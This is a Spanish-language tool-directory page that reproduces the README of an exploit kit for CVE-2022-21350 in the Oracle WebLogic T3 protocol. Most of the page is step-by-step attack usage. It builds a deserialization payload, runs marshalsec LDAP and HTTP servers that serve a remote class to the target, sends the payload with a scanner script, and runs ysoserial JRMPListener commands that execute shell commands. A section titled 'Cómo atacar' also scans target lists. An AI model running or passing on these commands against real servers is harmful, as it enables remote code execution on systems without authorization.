Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-21350 — Kit de explotación para CVE-2022-21350 dirigido al protocolo Oracle WebLogic T3 con generación de payloads, servidores LDAP/HTTP y soporte para múltiples versiones de JDK. | Kitploit
Herramientas/GitHubGitHub/hktalent/cve-2022-21350
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlDesarrollo de Payloads
GitHubhktalent/cve-2022-21350

CVE-2022-21350

Kit de explotación para CVE-2022-21350 dirigido al protocolo Oracle WebLogic T3 con generación de payloads, servidores LDAP/HTTP y soporte para múltiples versiones de JDK.

Ver Repositorio
338hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

¿Por qué dos PoCs?
Uno contiene
com._51pwn.hktalent.CreatJar.main(args);
se utiliza para crear la herramienta de generación de payload mínimo.
Después de crearlo, usa el otro.

Ejecutar CVE-2022-21350_powerBy_51pwn.jar para construir el payload da un error, pero no afecta el uso del payload.

Otros exploits

CVE_2020_2551
CVE_2020_2555
CVE_2020_2883
CVE_2020_14645
CVE_2020_14756
CVE_2020_14825
CVE_2020_14841
CVE_2021_2394
CVE_2022_21306
CVE_2022_21350

Cómo usar

1- Generar payload

docker run -d -p 7001:7001 -p 8453:8453 -v $PWD/setDomainEnv.sh:/home/weblogic/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/bin/setDomainEnv.sh hktalent/weblogic:12.2.1.4.0

java -cp CVE-2022-21350_powerBy_51pwn.jar com._51pwn.CVE_2022_21350.Main "t3://127.0.0.1:7001/" "ldap://docker.for.mac.localhost:1389/UpX34defineClass"

2- Iniciar servidor LDAP

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer 'http://docker.for.mac.localhost:8888/#UpX34defineClass' 1389

3- Iniciar servidor HTTP, para enviar el archivo de clase

node httpServer.js

4- Enviar payload

py3 ../WeblogicScan.py --tags 21350 -r -v -u http://127.0.0.1:7001
# more
cat ../T3_ver.txt|awk '{print $1}'|py3 ../WeblogicScan.py --tags 21350 -r -v -s  
java -server -Xdebug -Xnoagent -Xrunjdwp:transport=dt_socket,address=8453,server=y,suspend=n -Djava.compiler=NONE -cp ysuserial-0.9-su18-all.jar org.su18.ysuserial.exploit.JRMPListener 4444 CommonsCollections1 "ping 10.12.35.59"

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 4444 CommonsCollections1 "ping 10.12.35.59"
java -jar ./ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 "open /System/Applications/Calculator.app" >>/Users/51pwn/MyWork/TestPoc/JRMPListener.ser

¿Dónde está el payload?

cat test.ser

¿Por qué aparece un mensaje de error?

El error de ejecución no afecta la generación del payload ni su efecto.
El error de ejecución no afecta la generación del payload ni su efecto.

Cómo atacar

nuclei -duc -t ./network/detection/weblogic-t3-detect.yaml -l list.txt

Herramientas compatibles:

  • 1-versión de Weblogic
  • 12.1.3.0.0
  • 12.2.1.3.0
  • 12.2.1.4.0
  • 2-JDK < 1.8
  • 3-El servidor permite OOB

Cómo construir y fusionar JAR

cd lib3
# split 
py3 ../tools/splitTools.py -s wlfullclient_12.1.3.jar
# merge 
py3 ../tools/splitTools.py -m wlfullclient_12.1.3.jar

Agradecimientos especiales

  • <a href=https://github.com/lz520520>@lz520520
  • <a href=https://github.com/Y4er>@Y4er
Descargar herramienta